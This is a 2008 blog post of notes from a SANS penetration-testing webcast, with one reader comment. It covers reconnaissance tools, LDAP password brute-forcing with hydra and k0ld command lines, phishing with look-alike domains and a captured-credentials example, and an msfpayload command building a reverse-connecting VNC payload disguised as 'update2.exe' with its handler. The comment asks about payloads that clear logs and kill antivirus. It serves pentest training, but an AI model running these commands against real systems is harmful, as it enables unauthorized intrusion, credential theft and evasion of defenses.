Thursday, October 9, 2008

Notes from SANS Beyond Front-Line Exploits Webcast


Webcast http://www.sans.org/webcasts/show.php?webcastid=91586

Beyond Front-Line Exploits:
Tips and Tools for Comprehensive Penetration Testing

Lenny Zeltser August 2008

#1 Data in plain sight:

-(slide 6/7) site:example.com filetype:pdf
-(slide 8/9)Libextractor for extracting metadata
-(slide 10) Metagoofil
-(slide 11/12)maltego

#2: Remote Password-Guessing

-If you dont find possible usernames using the info in Data In Plain Sight, you can generate your own using
US Census to generate Top Last Names, Top Female First Names, Top Male First Names
http://www.census.gov/genealogy/names/names_files.html

*you'll have to figure out the naming convention for the company your auditing

**my note: have your top 40 username/pass I also have one for mssql passwords, at least you can do a "low hanging fruit" type check besides checking for null passwod

-(slide 15)theharvester for email gathering -use google, linkedin, pgp
-(slide 16) see if webpage gives you a clue if your username/pass is wrong username or wrong password based on error messages in the app
-(slide 17) validate usernames using brutus if the app return useful error messages
-(slide 18/19) create a list of good usernames and a short list of passwords that are worth trying "remote password guessing" writeup on ISC
-(slide 20) Accent Keyword Extractor, keywords that could be passwords for people in the company
-(slide 21) is the password recovery mechanism a weak link? ask you for secret question and display new password, can you use the app to find valid usernames? where if i enter in the wrong username it says i dont know who you are, where if i enter in a correct username a i get a secret question prompt
-(slide 24) if ldap exposed or queriable -- Ldap bruteforce with hydra $ hydra -L users.txt –P passwords.txt ldap.example.com ldap2 or $ k0ld –f users.txt -w passwords.txt -I -o out.txt -f 'cn=*' -h ldap.example.com k0ld is supposedly written specificicaly for ldap
-(slide 25) tsgrinder -- need old version or RDP client for tsgrinder to work, need version 5
** tut by me http://www.ethicalhacker.net/content/view/106/24/
** default 2k3 password complexity with shut this tool down without a good dictionary

#3: Social engineering
**just ask for what you need!
-(slide 29) email phish example for password reset
-(slide 30) ArGoSoft Mail Server Freeware allows you to relaymail locally
-(slide 31) register a similar domain name as your target, use domaintools.com to check for you. http://www.domaintools.com/domain-typo
-(slide 32) just present an error message after the user inputs creds to
-(slide 33) php backend and plugins to grab important data
USER: jsmith
PASSWORD: plumlips
LOCAL IP: 192.168.2.144
REMOTE IP: 208.77.188.166
PORT: 61035
USER AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-
US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
PLUGINS: Move Media Player; QuickTime Plug-in 7.4.1;
Mozilla Default Plug-in; RealJukebox NS Plugin;
RealPlayer(tm) G2 LiveConnect-Enabled Plug-In (32-bit);
Shockwave Flash; Java(TM) Platform SE 6 U2;

*current browsers are not allowing to pull local IP easily

#4: Client-Side Backdoors

-(slide 35/36) target those 3rd party client side vulnerabilities -- delivery is still email or web
-(slide 37) just ask user to install the malware
-(slide 38/39) reverse shell out to attacker, or use msfpayload, he used VNCreverse
$ msfpayload windows/vncinject/reverse_tcp LPORT=5544
LHOST=192.168.1.124 DisableCourtesyShell=True X >
update2.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/vncinject/reverse_tcp
Length: 177
Options: LHOST=192.168.1.124,LPORT=5544,
DisableCourtesyShell=True

$ msfcli exploit/multi/handler LPORT=5544
PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.124
DisableCourtesyShell=True E

-(slide 43) try to get some new things brought into scope for pentests especialy client sides

-from the questions, mindmap all that info above to organize, freemind is a free version
CG

1 comment:

Anonymous said...

Hi,

is it possible to create a payload with meterpreter scripts clearseclog and killav?

Thank you